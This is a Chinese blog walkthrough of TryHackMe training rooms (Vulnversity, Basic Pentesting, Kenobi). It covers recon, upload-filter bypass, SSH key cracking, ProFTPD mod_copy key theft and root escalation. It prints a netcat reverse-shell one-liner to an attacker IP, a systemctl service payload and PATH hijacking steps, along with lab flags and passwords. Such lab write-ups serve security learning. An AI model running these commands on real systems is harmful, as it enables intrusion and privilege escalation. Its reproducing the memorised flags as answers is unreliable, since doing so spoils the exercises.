Tryhackme-Basic Computer Exploitation

最新推荐文章于 2022-10-23 18:54:50 发布
最新推荐文章于 2022-10-23 18:54:50 发布
阅读量251 收藏
点赞数
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36531487/article/details/119571656
版权

Basic Computer Exploitation

文章目录

Vulnversity ⭐️反弹shell ⭐️systemctl提权

task1 Deploy the machine

无需回答

task2 Reconnaissance

1.There are many nmap “cheatsheets” online that you can use too.

无需回答

2.Scan the box, how many ports are open?

6

image-20210709160439714

3.What version of the squid proxy is running on the machine?

3.5.12

image-20210709160951200

4.How many ports will nmap scan if the flag -p-400 was used?

400

5.Using the nmap flag -n what will it not resolve?

DNS

-n 禁用DNS反向解析

6.What is the most likely operating system this machine is running?

Ubuntu

image-20210709161510799

7.What port is the web server running on?

3333

task3 Locating directories using GoBuster

1.What is the directory that has an upload form page?

/internal/

image-20210709163025593

task4 Compromise the webserver

1.Try upload a few file types to the server, what common extension seems to be blocked?

.php

image-20210709164333699

2.Run this attack, what extension is allowed?

.phtml

3.What is the name of the user who manages the webserver?

bill

image-20210709165015649

4.What is the user flag?

image-20210709165133666

task5 Privilege Escalation

1.On the system, search for all SUID files. What file stands out?

/bin/systemctl

find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件

/bin/systemctl 文件具备suid位可以用来提权

2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.

提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本

参考链接:Tryhackme - Vulnversity

Basic Pentesting

Task1 Web App Testing and Privilege Escalation

1.Deploy the machine and connect to our network

2.Find the services exposed by the machine

image-20210806100041866

3.What is the name of the hidden directory on the web server(enter name without /)?

development

image-20210806095855562

4.User brute-forcing to find the username & password

5.What is the username?

jan

使用enum4linux枚举用户得到

共享目录 //10.10.76.103/Anonymous

1_aczynkichcs2C56TUh-SWA

6.What is the password?

armando

image-20210806122826026

7.What service do you use to access the server(answer in abbreviation in all caps)?

SSH

8.Enumerate the machine to find any vectors for privilege escalation

9.What is the name of the other user you found(all lower case)?

kay

10.If you have found another user, what can you do with this information?

john破解OpenSSH私钥密码

1.ssh2john将id_rsa转换为john可读取的模式

ssh2john id_rsa > rsacrack

2.使用rockyou.txt爆破私钥密码

john rsacrack --wordlists=%字典%

image-20210806141151290

11.What is the final password you obtain?

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

image-20210806141410167

Kenobi ⭐️SMB

task1 Deploy the vulnerable machine

1.Make sure you’re connected to our network and deploy the machine

2.Scan the machine with nmap, how many ports are open?

7

image-20210713165932709

task2 Enumerating Samba for shares

1.Using the nmap command above, how many shares have been found?

3

image-20210713170152967

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.162 使用脚本扫描445端口

2.On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.

smbclient //<ip>/anonymous

Once you’re connected, list the files on the share. What is the file can you see?

log.txt

image-20210713171401526

3.Open the file on the share. There is a few interesting things found.

  • Information generated for Kenobi when generating an SSH key for the user
  • Information about the ProFTPD server.

What port is FTP running on?

21

image-20210713171227377

4.Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount MACHINE_IP

What mount can we see?

/var

image-20210713173133797

task3 Gain initial access with ProFtpd ⭐️ProFtpd

1.Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.

What is the version?

1.3.5

image-20210713173414894

2.We can use searchsploit to find exploits for a particular software version.

Searchsploit is basically just a command line search tool for exploit-db.com.

How many exploits are there for the ProFTPd running?

3

image-20210713174201668

3.You should have found an exploit from ProFtpd’s mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

从log.txt文件中得知密钥地址和共享地址

image-20210713182101707

image-20210713182149434

nc连接21端口

  nc 10.10.34.242 21

再执行命令,复制密钥文件至共享目录,再下载,使用密钥文件登录kenobi账号

site cpfr /home/kenobi/.ssh/id_rsa
site cpto /home/kenobi/share/id_rsa

image-20210713182441433

4.We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.

5.mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

What is Kenobi’s user flag (/home/kenobi/user.txt)?

d0b0f3f53b6caa532a83915e19224899

image-20210714093858840

task4 Privilege Escalation with Path Variable Manipulation ⭐️环境变量提权

1.To search the a system for these type of files run the following: find / -perm -u=s -type f 2>/dev/null

What file looks particularly out of the ordinary?

/usr/bin/menu

2.Run the binary, how many options appear?

3

image-20210714112233044

3.We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary… Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!

提权条件: -rwsr-xr-x menu

文件执行时会在环境变量中查找curl,自建curl文件赋予可执行权限,至于可写目录加入环境变量中替代curl程序以root权限执行即可提权.

export PATH=/tmp:$PATH将/tmp目录写入环境变量

4.What is the root flag (/root/root.txt)?

177b3cd8562289f37382721c28381f02

a version of /usr/sh, as well as this file being run as root it runs our shell as root!

提权条件: -rwsr-xr-x menu

文件执行时会在环境变量中查找curl,自建curl文件赋予可执行权限,至于可写目录加入环境变量中替代curl程序以root权限执行即可提权.

export PATH=/tmp:$PATH将/tmp目录写入环境变量

4.What is the root flag (/root/root.txt)?

177b3cd8562289f37382721c28381f02

image-20210714113038981

zhangwenbo1229
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tryhackme - Vulnversity (考点:上传 & burp intruder & systemctl提权)
冬萍子癸水
05-25 704
1 扫描 21想到进去找文件,22可能有ssh登录,139 445 去smb找文件,3128可能有代理转发,3333是http web进去搜集信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
Tryhackme-Basic Pentesting
个人博客
09-14 305
Basic Pentesting 文章目录Basic PentestingTask1 Web App Testing and Privilege Escalation Task1 Web App Testing and Privilege Escalation 1.Deploy the machine and connect to our network 2.Find the services exposed by the machine 3.What is the name of the hidden
asterisk卡常见问题(收集整理)
seven407的专栏
10-17 1万+
以下转自:http://space.taobao.com/e2e26e6e41fda171bf6ec37c526f6893/show_blog-22524724.htmQ:系统检测不到内线模块A:通常是因为没有插上电源接头。如果卡上有内线模块,则需要将PC机箱电源引出的插头插到卡上右边的电源接口上。 Q:模拟卡检测不到外线挂机Q:听到的摘机信号音与普通的电话摘机信号音不一致。A:国内用户经常反
kb-vuln3(systemctl提权)
m0_66299232的博客
10-23 872
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell。9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异。systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功。攻击机系统:kali linux 2021.1。
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
【标题】:“TryHackMe-Writeups:对TryHackMe平台机器的学习笔记” 【描述】:“TryHackMe是一个在线学习平台,专注于网络安全和渗透测试。这个压缩包包含了我在尝试并解决TryHackMe上的各种虚拟机时所记录的笔记...
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 ... 敲门(端口敲门)
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
Windows-10-Exploitation
03-21
Windows-10-Exploitation
linux-kernel-exploitation:与Linux内核安全性和利用有关的链接的集合
02-05
"linux-kernel-exploitation"项目集合了一系列与Linux内核安全相关的链接,这包括漏洞分析、exploit开发、权限提升和安全防护等方面的知识。 1. **Linux内核漏洞**:内核中的漏洞可能源于编程错误,如缓冲区溢出、...
docker
weixin_41238665的博客
12-12 7052
安装docker [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jZSrMR1a-1607762393595)(C:\Users\mr.chen\AppData\Roaming\Typora\typora-user-images\1605364846284.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uTt7HSEX-1607762393596)(C:\Users\mr.chen\AppData\Roaming\Typora\.
云计算-Linux-特殊权限-SUID-SGID-SBIT-ACL
weixin_48137911的博客
10-03 569
然后呢,acl上,设置权限,赋予了这个读写的权限,针对这个/etc的这个目录。这个代表这个目录有r权限,证明普通用户在这个绿色的目录下,干什么都行。首先呢,我这的用户有一堆,我就用这个我的id-ccie-yasuo了。但是注意哈,是不能删tmp的,他在根目录下呢,root才能删。代表他的权限有点大~首先呢,这个cat是在这个/use/bin的目录下的。他不是rwx,而是rws,这个s就这个特殊的权限了。显示这个权限是+号的,则代表是ACL添加的权限了。在这个目录下,虽然有权限,但是呢是删除不了的。
php文件管理
weixin_33947521的博客
04-21 6万+
<html> <head> <title> java </title> </head> <body> <style type="text/css"> body{ background: #E4E4E4; color: #666666; font-...
羊城杯wp
蚁景网安学院
09-23 4899
1PWN1、Babyrop栈溢出,且存在后门函数;利用func1将'/cin/sh'修改为'/bin/sh',利用func2调用参数执行system('/bin/sh')即可#!usr/b...
centos7配置web服务器
qq_44390296的博客
11-09 3457
centos7配置web服务器 准备 环境: ​ VMware Workstation Pro ​ Linux/CentOS-7-x86_64-DVD-2009.iso ​ 安装省略(有手就行) 配置静态ip 前期 安装成功后登录账号密码,先ping一下百度看看是否能上网 ping www.baidu.com 如下图表示:无法上网 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J4EWXBaW-1636434439191)(C:\Users\lying\AppDat
Docker
weixin_43847058的博客
06-01 913
Docker基础学习
文件下载---base64
热门推荐
大香蕉的博客
11-18 18万+
前端文件下载 base64前缀
攻防世界——web高手进阶区题解
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
xss exploitation tool
最新发布
08-21
XSS Exploitation Tool(跨站脚本攻击利用工具)是指用于实施跨站脚本攻击的软件或工具。跨站脚本攻击是一种网络安全威胁,攻击者通过注入恶意脚本代码到受害者的网页中,使得该脚本在用户浏览器中执行,并窃取敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值